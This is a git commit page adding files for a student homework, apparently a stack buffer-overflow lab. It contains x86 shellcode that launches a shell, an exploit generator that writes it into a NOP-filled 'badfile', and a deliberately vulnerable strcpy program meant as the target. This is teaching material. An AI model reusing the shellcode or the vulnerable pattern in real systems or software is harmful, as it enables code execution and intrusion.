organizing. Initial hw2 commit.
This commit is contained in:
Alex Huddleston
parent
2dc7015d7a
commit
2f9a0e6b31
11 changed files with 102 additions and 0 deletions
BIN
hw2/badfile
Normal file
BIN
hw2/badfile
Normal file
Binary file not shown.
27
hw2/call_shellcode.c
Executable file
27
hw2/call_shellcode.c
Executable file
|
|
@ -0,0 +1,27 @@
|
||||||
|
/* call_shellcode.c */
|
||||||
|
/*A program that creates a file containing code for launching shell*/
|
||||||
|
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
const char code[] =
|
||||||
|
"\x31\xc0" /* Line 1: xorl %eax,%eax */
|
||||||
|
"\x50" /* Line 2: pushl %eax */
|
||||||
|
"\x68""/zsh" /* Line 3: pushl $0x68732f2f */
|
||||||
|
"\x68""/bin" /* Line 4: pushl $0x6e69622f */
|
||||||
|
"\x89\xe3" /* Line 5: movl %esp,%ebx */
|
||||||
|
"\x50" /* Line 6: pushl %eax */
|
||||||
|
"\x53" /* Line 7: pushl %ebx */
|
||||||
|
"\x89\xe1" /* Line 8: movl %esp,%ecx */
|
||||||
|
"\x99" /* Line 9: cdql */
|
||||||
|
"\xb0\x0b" /* Line 10: movb $0x0b,%al */
|
||||||
|
"\xcd\x80" /* Line 11: int $0x80 */
|
||||||
|
;
|
||||||
|
|
||||||
|
int main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
char buf[sizeof(code)];
|
||||||
|
strcpy(buf, code);
|
||||||
|
((void(*)( ))buf)( );
|
||||||
|
}
|
||||||
39
hw2/exploit.c
Executable file
39
hw2/exploit.c
Executable file
|
|
@ -0,0 +1,39 @@
|
||||||
|
/* exploit.c */
|
||||||
|
|
||||||
|
/* A program that creates a file containing code for launching shell*/
|
||||||
|
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
char shellcode[]=
|
||||||
|
"\x31\xc0" /* xorl %eax,%eax */
|
||||||
|
"\x50" /* pushl %eax */
|
||||||
|
"\x68""/zsh" /* pushl $0x68732f2f */
|
||||||
|
"\x68""/bin" /* pushl $0x6e69622f */
|
||||||
|
"\x89\xe3" /* movl %esp,%ebx */
|
||||||
|
"\x50" /* pushl %eax */
|
||||||
|
"\x53" /* pushl %ebx */
|
||||||
|
"\x89\xe1" /* movl %esp,%ecx */
|
||||||
|
"\x99" /* cdql */
|
||||||
|
"\xb0\x0b" /* movb $0x0b,%al */
|
||||||
|
"\xcd\x80" /* int $0x80 */
|
||||||
|
;
|
||||||
|
|
||||||
|
int main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
char buffer[517];
|
||||||
|
FILE *badfile;
|
||||||
|
|
||||||
|
/* Initialize buffer with 0x90 (NOP instruction) */
|
||||||
|
memset(&buffer, 0x90, 517);
|
||||||
|
|
||||||
|
/* You need to fill the buffer with appropriate contents here */
|
||||||
|
strcpy(buffer, shellcode);
|
||||||
|
|
||||||
|
/* Save the contents to the file "badfile" */
|
||||||
|
badfile = fopen("./badfile", "w");
|
||||||
|
|
||||||
|
fwrite(buffer, 517, 1, badfile);
|
||||||
|
fclose(badfile);
|
||||||
|
}
|
||||||
9
hw2/shellcode.c
Executable file
9
hw2/shellcode.c
Executable file
|
|
@ -0,0 +1,9 @@
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
int main( ) {
|
||||||
|
char *name[2];
|
||||||
|
name[0] = "/bin/zsh";
|
||||||
|
name[1] = NULL;
|
||||||
|
execve(name[0], name, NULL);
|
||||||
|
}
|
||||||
27
hw2/stack.c
Executable file
27
hw2/stack.c
Executable file
|
|
@ -0,0 +1,27 @@
|
||||||
|
/* stack.c */
|
||||||
|
|
||||||
|
/* This program has a buffer overflow vulnerability. */
|
||||||
|
/* Our task is to exploit this vulnerability */
|
||||||
|
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
int bof(char *str)
|
||||||
|
{
|
||||||
|
char buffer[12];
|
||||||
|
/* The following statement has a buffer overflow problem */
|
||||||
|
strcpy(buffer, str);
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
void main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
char str[517];
|
||||||
|
FILE *badfile;
|
||||||
|
badfile = fopen("badfile", "r");
|
||||||
|
fread(str, sizeof(char), 517, badfile);
|
||||||
|
bof(str);
|
||||||
|
printf("Returned Properly\n");
|
||||||
|
return 1;
|
||||||
|
}
|
||||||
Reference in a new issue